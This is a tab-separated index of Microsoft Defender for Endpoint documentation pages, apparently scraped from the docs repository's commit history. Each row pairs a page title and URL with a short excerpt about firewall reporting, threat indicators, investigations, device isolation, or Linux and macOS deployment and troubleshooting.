security	Host Firewall Reporting	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/host-firewall-reporting.md	The query can now be executed, and all related Firewall events from the last 30 For more reporting, or custom changes, the query can be exported into Power BI for further analysis. Custom reporting can be facilitated by downloading the [Custom Reporting script](https://github.com/microsoft/MDATP-PowerBI-Templates/tree/master/Firewall) to monitor the Windows Defender Firewall activities using Power BI.
security	Import Export Exploit Protection Emet Xml	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/import-export-exploit-protection-emet-xml.md	You can use Group Policy to deploy the configuration you've created to multiple - [Evaluate exploit protection](evaluate-exploit-protection.md) - [Enable exploit protection](enable-exploit-protection.md) - [Configure and audit exploit protection mitigations](customize-exploit-protection.md)
security	Import Ti Indicators	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/import-ti-indicators.md	Here is an example of the response. ## Related topic - [Manage indicators](manage-indicators.md)
security	Indicator Certificates	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-certificates.md	It's important to understand the following requirements prior to creating indica - [Create indicators for IPs and URLs/domains](indicator-ip-domain.md) - [Manage indicators](indicator-manage.md) - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security	Indicator File	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-file.md	Microsoft Defender Vulnerability Management's block vulnerable application featu - [Create indicators based on certificates](indicator-certificates.md) - [Manage indicators](indicator-manage.md) - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security	Indicator Ip Domain	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-ip-domain.md	The result is that categories 1-4 are all blocked. This is illustrated in the fo - [Create indicators based on certificates](indicator-certificates.md) - [Manage indicators](indicator-manage.md) - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security	Indicator Manage	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/indicator-manage.md	Watch this video to learn how Microsoft Defender for Endpoint provides multiple - [Create indicators for IPs and URLs/domains](indicator-ip-domain.md) - [Create indicators based on certificates](indicator-certificates.md) - [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security	Information Protection Investigation	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/information-protection-investigation.md	Learn how to use data sensitivity labels to prioritize incident investigation. - [Learn about sensitivity labels in Office 365](../../compliance/sensitivity-labels.md) - [Learn to apply sensitivity label inside of email or Office](https://support.microsoft.com/office/apply-sensitivity-labels-to-your-files-and-email-in-office-2f96e7cd-d5a4-403b-8bd7-4cc636bae0f9)-- [Learn how to use sensitivity labels as a condition when applying Data Loss Prevention](../../compliance/dlp-sensitivity-label-as-condition.md) +- [Learn how to use sensitivity labels as a condition when applying Data Loss Prevention](../../compliance/dlp-sensitivity-label-as-condition.md)
security	Initiate Autoir Investigation	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/initiate-autoir-investigation.md	POST https://api.security.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e41 "Comment": "Test investigation" } ```
security	Internet Facing Devices	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/internet-facing-devices.md	You can report an inaccuracy for a device with incorrect internet-facing informa ## See also - [Device inventory](machines-view-overview.md)
security	Investigate Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-alerts.md	If you are experiencing a false alert with a line-of-business application, creat - [Investigate an IP address associated with a Defender for Endpoint alert](investigate-ip.md) - [Investigate a domain associated with a Defender for Endpoint alert](investigate-domain.md) - [Investigate a user account in Defender for Endpoint](investigate-user.md)
security	Investigate Behind Proxy	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-behind-proxy.md	DeviceNetworkEvents ## Related articles - [Applying network protection with GP - policy CSP](/windows/client-management/mdm/policy-csp-defender#defender-enablenetworkprotection)
security	Investigate Domain	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-domain.md	Using the export button above the table, you can export all the data into a .csv - [Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md) - [Investigate an IP address associated with a Microsoft Defender for Endpoint alert](investigate-ip.md) - [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)
security	Investigate Files	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-files.md	The file capabilities view lists a file's activities as mapped to the MITRE ATT& - [Investigate an IP address associated with a Microsoft Defender for Endpoint alert](investigate-ip.md) - [Investigate a domain associated with a Microsoft Defender for Endpoint alert](investigate-domain.md) - [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)-- [Take response actions on a file](respond-file-alerts.md) +- [Take response actions on a file](respond-file-alerts.md)
security	Investigate Incidents	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-incidents.md	You can click the circles on the incident graph to view the details of the malic - [Incidents queue](/microsoft-365/security/defender-endpoint/view-incidents-queue) - [Investigate incidents in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/investigate-incidents) - [Manage Microsoft Defender for Endpoint incidents](/microsoft-365/security/defender-endpoint/manage-incidents)
security	Investigate Ip	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-ip.md	Clicking any of the device names will take you to that device's view, where you - [Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md) - [Investigate a domain associated with a Microsoft Defender for Endpoint alert](investigate-domain.md) - [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)
security	Investigate Machines	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-machines.md	To gain an in-depth view of the device health report, you can go to **Reports > - [Investigate a domain associated with a Defender for Endpoint alert](investigate-domain.md) - [Investigate a user account in Defender for Endpoint](investigate-user.md) - [Security recommendation](tvm-security-recommendation.md)-- [Software inventory](tvm-software-inventory.md) +- [Software inventory](tvm-software-inventory.md)
security	Investigate User	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigate-user.md	You can filter the results by the following time periods: - [Investigate devices in the Defender for Endpoint Devices list](investigate-machines.md) - [Investigate an IP address associated with a Defender for Endpoint alert](investigate-ip.md) - [Investigate a domain associated with a Defender for Endpoint alert](investigate-domain.md)
security	Investigation	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/investigation.md	triggeringAlertId\|String\|The ID of the alert that triggered the investigation. "triggeringAlertId": "da637139127150012465_1011995739" } ```
security	Ios Configure Features	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-configure-features.md	Use the following steps to configure the option to send feedback data to Microso ## Report unsafe site Phishing websites impersonate trustworthy websites for the purpose of obtaining your personal or financial information. Visit the [Provide feedback about network protection](https://www.microsoft.com/wdsi/filesubmission/exploitguard/networkprotection) page to report a website that could be a phishing site.
security	Ios Install Unmanaged	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-install-unmanaged.md	Microsoft Defender for Endpoint on iOS enables the app protection policy scenari When app protection policies are configured for apps to include device risk signals from Microsoft Defender for Endpoint, users will be redirected to install Microsoft Defender for Endpoint when using such apps. Alternately, users can also install the latest version of the app directly from the Apple app store. Ensure the device is registered to Authenticator with the same account being used to onboard in Defender for successful MAM registration.
security	Ios Install	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-install.md	Admins can configure auto-setup of VPN profile. This will automatically set up t - [Configure app protection policy to include Defender for Endpoint risk signals (MAM)](ios-install-unmanaged.md) - [Configure Defender for Endpoint on iOS features](ios-configure-features.md)
security	Ios Privacy	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-privacy.md	Feedback Data is collected through in-app feedback provided by the user. - Feedback type (smile, frown, idea) and any feedback comments submitted by the user. For more information, see [More on Privacy](https://aka.ms/mdatpiosprivacystatement).
security	Ios Troubleshoot	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-troubleshoot.md	If a user faces an issue which isn't already addressed in the above sections or - Choose from the given options. To report an issue, select I don't like something. - Provide details of the issue that you're facing and check Send diagnostic data. We recommend that you include your email address so that the team can contact you for a solution or a follow-up. - Tap Submit to successfully send the feedback.
security	Ios Whatsnew	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/ios-whatsnew.md	On January 25, 2022, we announced the general availability of Vulnerability mana - With this version, we are announcing support for iPadOS/iPad devices. - Bug fixes.
security	Isolate Machine	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/isolate-machine.md	POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2 ``` - To release a device from isolation, see [Release device from isolation](unisolate-machine.md).
security	Limited Periodic Scanning Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/limited-periodic-scanning-microsoft-defender-antivirus.md	Sliding the switch to On will show the standard Microsoft Defender Antivirus > - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md) > - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) > - [Configure Defender for Endpoint on Android features](android-configure.md) -> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md) +> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security	Linux Deploy Defender For Endpoint With Chef	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-deploy-defender-for-endpoint-with-chef.md	then end end ```
security	Linux Exclusions	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-exclusions.md	For example, to add `EICAR-Test-File (not a virus)` (the threat name associated ```bash mdatp threat allowed add --name "EICAR-Test-File (not a virus)" ```
security	Linux Install Manually	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-manually.md	See [Uninstall](linux-resources.md#uninstall-defender-for-endpoint-on-linux) for ## See also - [Investigate agent health issues](health-status.md)
security	Linux Install With Ansible	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-with-ansible.md	When upgrading your operating system to a new major version, you must first unin ## See also - [Investigate agent health issues](health-status.md)
security	Linux Install With Puppet	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-with-puppet.md	class remove_mdatp { } } ```
security	Linux Install With Saltack	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-with-saltack.md	When upgrading your operating system to a new major version, you must first unin ## See also - [Investigate agent health issues](health-status.md)
security	Linux Preferences	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-preferences.md	To verify that your /etc/opt/microsoft/mdatp/managed/mdatp_managed.json is worki Once you've built the configuration profile for your enterprise, you can deploy it through the management tool that your enterprise is using. Defender for Endpoint on Linux reads the managed configuration from the /etc/opt/microsoft/mdatp/managed/mdatp_managed.json file.
security	Linux Privacy	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-privacy.md	The following fields are collected: ## Resources - [Privacy at Microsoft](https://privacy.microsoft.com/)
security	Linux Pua	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-pua.md	In your enterprise, you can configure PUA protection from a management console, ## Related articles - [Set preferences for Defender for Endpoint on Linux](linux-preferences.md)
security	Linux Resources	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-resources.md	The following table lists commands for some of the most common scenarios. Run `m \|Endpoint Detection and Response\|Set / remove tag, only `GROUP` supported\|`mdatp edr tag set --name GROUP --value [tag]`\| \|Endpoint Detection and Response\|List exclusions (root)\|`mdatp edr exclusion list [processes\|paths\|extensions\|all]`\| \|
security	Linux Schedule Scan Mde	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-schedule-scan-mde.md	crontab -u username -r \| \| \| \| +ΓÇö- day of week (values: 0 - 6) (Sunday=0 or 7) (special characters: , \- \* / L W C) <br> \| \| \| \| \|*****command to be executed ```
security	Linux Static Proxy Configuration	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-static-proxy-configuration.md	sudo systemctl daemon-reload; sudo systemctl restart mdatp > [!NOTE] > Red Hat Enterprise Linux 6.X and CentOS 6.X don't support systemctl and /etc/environment methods. To configure static proxy for MDE on these distributions, use the Recommended mdatp config proxy set method.
security	Linux Support Connectivity	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-connectivity.md	If the problem persists, contact customer support. ## Resources - For more information about how to configure the product to use a static proxy, see [Configure Microsoft Defender for Endpoint for static proxy discovery](linux-static-proxy-configuration.md).
security	Linux Support Events	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-events.md	List the filesystems on the machine with: ```bash df -Th ```
security	Linux Support Install	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-install.md	Now try restarting the mdatp service using step 2. Revert the configuration chan ``` Path to a zip file that contains the logs will be displayed as an output. Reach out to our customer support with these logs.
security	Linux Support Perf	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-perf.md	When the ratelimit is enabled a rule will be added in AuditD to handle 2500 even ## See also - [Investigate agent health issues](health-status.md)
security	Linux Support Rhel	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-support-rhel.md	pmap -x <wdavdaemon pid> Where `<wdavdaemon pid>` can be found using `pidof wdavdaemon`.
security	Linux Update Mde Linux	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-update-mde-linux.md	crontab -u username -r \| \| \| \| +ΓÇö- day of week (values: 0 - 6) (Sunday=0 or 7) (special characters: , - * / L W C) <br> \| \| \| \| \|*****command to be executed </pre>
security	Linux Updates	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-updates.md	sudo apt-get install --only-upgrade mdatp > [!IMPORTANT] > When integrating Microsoft Defender for Endpoint and Defender for Cloud, the mdatp agent will automatically receive updates by default. -To schedule an update of Microsoft Defender for Endpoint on Linux, see [Schedule an update of the Microsoft Defender for Endpoint (Linux)](linux-update-mde-linux.md) +To schedule an update of Microsoft Defender for Endpoint on Linux, see [Schedule an update of the Microsoft Defender for Endpoint (Linux)](linux-update-mde-linux.md)
security	Linux Whatsnew	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-whatsnew.md	As an alternative to the above, you can follow the instructions to [uninstall](/ </details> </blockquote></details>
security	List Library Files	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/list-library-files.md	Content-type: application/json ## Related topic-- [Run live response](run-live-response.md) +- [Run live response](run-live-response.md)
security	List Recommendation Software	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/list-recommendation-software.md	Here is an example of the response. - [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt) - [Defender Vulnerability Management security recommendation](/microsoft-365/security/defender-endpoint/tvm-security-recommendation)
security	Live Response Command Examples	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/live-response-command-examples.md	undo scheduledtask Microsoft\Windows\Subscription\LicenseAcquisition # Restore remediated file undo file c:\Users\user\Desktop\malware.exe ```
security	Live Response Library Methods	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/live-response-library-methods.md	Last updated 06/03/2021 \|--\|-\|--\| \| Commands \| Live Response command collection \| Array of Command objects. See [live response commands](live-response.md#live-response-commands). \|
security	Live Response	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/live-response.md	Select the Command log tab to see the commands used on the device during a s ## Related article - [Live response command examples](live-response-command-examples.md)
security	Mac Device Control Faq	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-faq.md	Answer 2: Run _mdatp device-control policy groups list_ to see all the iOS group - [Device Control for macOS](mac-device-control-overview.md) - [Deploy and manage Device Control using Intune](mac-device-control-intune.md) - [Deploy and manage Device Control using jamf](mac-device-control-jamf.md)
security	Mac Device Control Intune	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-intune.md	You can deploy the mobileconfig file through [*https://endpoint.microsoft.com/ - [Device Control for macOS](mac-device-control-overview.md) - [Deploy and manage Device Control using jamf](mac-device-control-jamf.md) - [macOS Device Control frequently asked questions (FAQ)](mac-device-control-faq.md)
security	Mac Device Control Jamf	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-jamf.md	A new 'Device Control' property will now be available to add to the UX. - [Device Control for macOS](mac-device-control-overview.md) - [Deploy and manage Device Control using Intune](mac-device-control-intune.md) - [macOS Device Control frequently asked questions (FAQ)](mac-device-control-faq.md)
security	Mac Device Control Overview	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-overview.md	In this case, only have one access rule policy, but if you have multiple, make s - [Deploy Device Control by using Intune](mac-device-control-intune.md) - [Deploy Device Control by using JAMF](mac-device-control-jamf.md) - [macOS Device Control frequently asked questions (FAQ)](mac-device-control-faq.md)
security	Mac Exclusions	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-exclusions.md	For example, to add `EICAR-Test-File (not a virus)` (the threat name associated ```bash mdatp threat allowed add --name "EICAR-Test-File (not a virus)" ```
security	Mac Install Jamfpro Login	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-jamfpro-login.md	Last updated 12/18/2020 ## Next step [Setup the device groups in Jamf Pro](mac-jamfpro-device-groups.md)
security	Mac Install Manually	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-manually.md	See [Logging installation issues](mac-resources.md#logging-installation-issues) ## Uninstallation See [Uninstalling](mac-resources.md#uninstalling) for details on how to remove Microsoft Defender for Endpoint on macOS from client devices.
security	Mac Install With Intune	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-with-intune.md	For more information on how to find the automatically generated log that is crea ## Uninstallation See [Uninstalling](mac-resources.md#uninstalling) for details on how to remove Microsoft Defender for Endpoint on macOS from client devices.
security	Mac Install With Jamf	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-with-jamf.md	This is a multi-step process. You'll need to complete all of the following steps [!INCLUDE [Defender for Endpoint repackaging warning](../../includes/repackaging-warning.md)]
security	Mac Install With Other Mdm	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-install-with-other-mdm.md	We post notifications to our [What's New page](mac-whatsnew.md) once we make cha ## Check installation status Run [Microsoft Defender for Endpoint](mac-install-with-jamf.md) on a client device to check the onboarding status.
security	Mac Jamfpro Device Groups	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-jamfpro-device-groups.md	Set up the device groups similar to Group policy organizational unite (OUs), Mi ## Next step - [Set up Microsoft Defender for Endpoint on macOS policies in Jamf Pro](mac-jamfpro-policies.md)
security	Mac Jamfpro Enroll Devices	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-jamfpro-enroll-devices.md	For a complete list, see [About Computer Enrollment](https://docs.jamf.com/9.9/c 6. Select Continue to complete the configuration. :::image type="content" source="images/jamfpro-mdm-profile.png" alt-text="The Jamf Pro enrollment6" lightbox="images/jamfpro-mdm-profile.png":::
security	Mac Jamfpro Policies	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-jamfpro-policies.md	You need to make sure that all machines receiving Defender's package, also recei > Making configuration profiles depending on Defender's presence effectively delays deployment of configuration profiles, and results in an initially unhealthy product and/or prompts for manual approval of certian application permissions, that are otherwise auto approved by profiles. Deploying a policy with Microsoft Defender's package after deploying configuration profiles ensures the end user's best experience, because all required configurations will be applied before the package installs.
security	Mac Preferences	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-preferences.md	From the JAMF console, open Computers \> Configuration Profiles, navigat ## Resources - [Configuration Profile Reference (Apple developer documentation)](https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf)
security	Mac Privacy	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-privacy.md	The following fields are collected: ## Resources - [Privacy at Microsoft](https://privacy.microsoft.com/)
security	Mac Pua	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-pua.md	In your enterprise, you can configure PUA protection from a management console, ## Related topics - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
security	Mac Resources	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-resources.md	To enable autocompletion in zsh: ## Microsoft Defender for Endpoint portal information The Microsoft Defender for Endpoint blog, [EDR capabilities for macOS have now arrived](https://techcommunity.microsoft.com/t5/microsoft-defender-atp/edr-capabilities-for-macos-have-now-arrived/ba-p/1047801) provides detailed guidance on what to expect.
security	Mac Schedule Scan	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-schedule-scan.md	The following code shows the schema you need to use to schedule a quick scan. You can also schedule scans with Microsoft Intune. The runMDATPQuickScan.sh shell script available at [Scripts for Microsoft Defender for Endpoint](https://github.com/microsoft/shell-intune-samples/tree/master/macOS/Config/MDATP) will persist when the device resumes from sleep mode. See [Use shell scripts on macOS devices in Intune](/mem/intune/apps/macos-shell-scripts) for more detailed instructions on how to use this script in your enterprise.
security	Mac Support Install	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-install.md	grep '^2020-03-11 13:08' /var/log/install.log ```Output log show --start '2020-03-11 13:00:00' --end '2020-03-11 13:08:50' --info --debug --source --predicate 'processImagePath CONTAINS[C] "install"' --style syslog ```
security	Mac Support Kext	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-kext.md	In this case, you need to perform the following steps to trigger the approval fl real_time_protection_available : true ... ```
security	Mac Support License	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-license.md	You can also suppress switching to experience for Individuals on MDM-enrolled ma - [Set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro](mac-jamfpro-policies.md): Learn how to set up the Microsoft Defender for Endpoint on macOS policies in Jamf Pro. - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md): Learn how to install, configure, update, and use Microsoft Defender for Endpoint on Mac. - [Deploying Microsoft Defender for Endpoint on macOS with Jamf Pro](mac-install-with-jamf.md): Learn how to deploy Microsoft Defender for Endpoint on macOS with Jamf Pro.
security	Mac Support Perf	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-support-perf.md	-∩╗┐ + Title: Troubleshoot performance issues for Microsoft Defender for Endpoint on macOS description: Troubleshoot performance issues in Microsoft Defender for Endpoint on macOS. keywords: microsoft, defender, Microsoft Defender for Endpoint, mac, performance, big sur, monterey, ventura, mde for mac To run the client analyzer for troubleshooting performance issues, see [Run the ## See also - [Investigate agent health issues](health-status.md)
security	Mac Sysext Policies	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-sysext-policies.md	To deploy this custom configuration profile: 5. In the `Assignments` tab, assign this profile to All Users & All devices. 6. Review and create this configuration profile.
security	Mac Updates	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-updates.md	To configure MAU, you can deploy this configuration profile from the management ## Resources - [msupdate reference](/deployoffice/mac/update-office-for-mac-using-msupdate)
security	Mac Whatsnew	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-whatsnew.md	Microsoft Defender for Endpoint no longer supports macOS Catalina (10.15) as App </details>
security	Machine Groups	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine-groups.md	For more information on linking to device groups definitions, see [Device groups - [Manage portal access using role-based based access control](rbac.md) - [Create and manage device tags](machine-tags.md) - [Get list of tenant device groups using Graph API](/graph/api/device-list-memberof)
security	Machine Tags	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine-tags.md	You can use Microsoft Intune to define and apply device tags. You can perform th - For Windows 10 or later, in the [OMA-IRU settings](/mem/intune/configuration/custom-settings-windows-10) section, for Data type, choose String. For OMA-URI, type (or paste) `./Device/Vendor/MSFT/WindowsAdvancedThreatProtection/DeviceTagging/Group`. - For macOS, follow the guidance in [Use custom settings for macOS devices in Microsoft Intune](/mem/intune/configuration/custom-settings-macos).
security	Machine	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machine.md	Last updated 12/18/2020 \|deviceValue\|Nullable Enum\|The [value of the device](tvm-assign-device-value.md). Possible values are: 'Normal', 'Low' and 'High'.\| \|ipAddresses\|IpAddress collection\|Set of *IpAddress* objects. See [Get machines API](get-machines.md).\| \|osArchitecture\|String\|Operating system architecture. Possible values are: "32-bit", "64-bit". Use this property instead of osProcessor.\|
security	Machineaction	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machineaction.md	Last updated 12/18/2020 "relatedFileInfo": null } ```
security	Machines View Overview	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/machines-view-overview.md	On the IoT devices tab, select Customize columns to see the columns avai [Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md)
security	Manage Alerts	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-alerts.md	Added comments instantly appear on the pane. - [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)
security	Manage Auto Investigation	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-auto-investigation.md	All verdicts are tracked in the [Action center](auto-investigation-action-center ## See also - [Overview of automated investigations](automated-investigations.md)
security	Manage Automation File Uploads	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-automation-file-uploads.md	For example, if you add exe and bat as file or attachment extension names, t ## Related topics - [Manage automation folder exclusions](manage-automation-folder-exclusions.md)
security	Manage Automation Folder Exclusions	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-automation-folder-exclusions.md	You can control the following attributes about the folder that you'd like to be - [Manage automation allowed/blocked lists](manage-indicators.md) - [Manage automation file uploads](manage-automation-file-uploads.md)-- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md) +- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security	Manage Event Based Updates Microsoft Defender Antivirus	https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-event-based-updates-microsoft-defender-antivirus.md	If you have enabled cloud-delivered protection, Microsoft Defender Antivirus wil - [Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md) - [Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md) - [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)
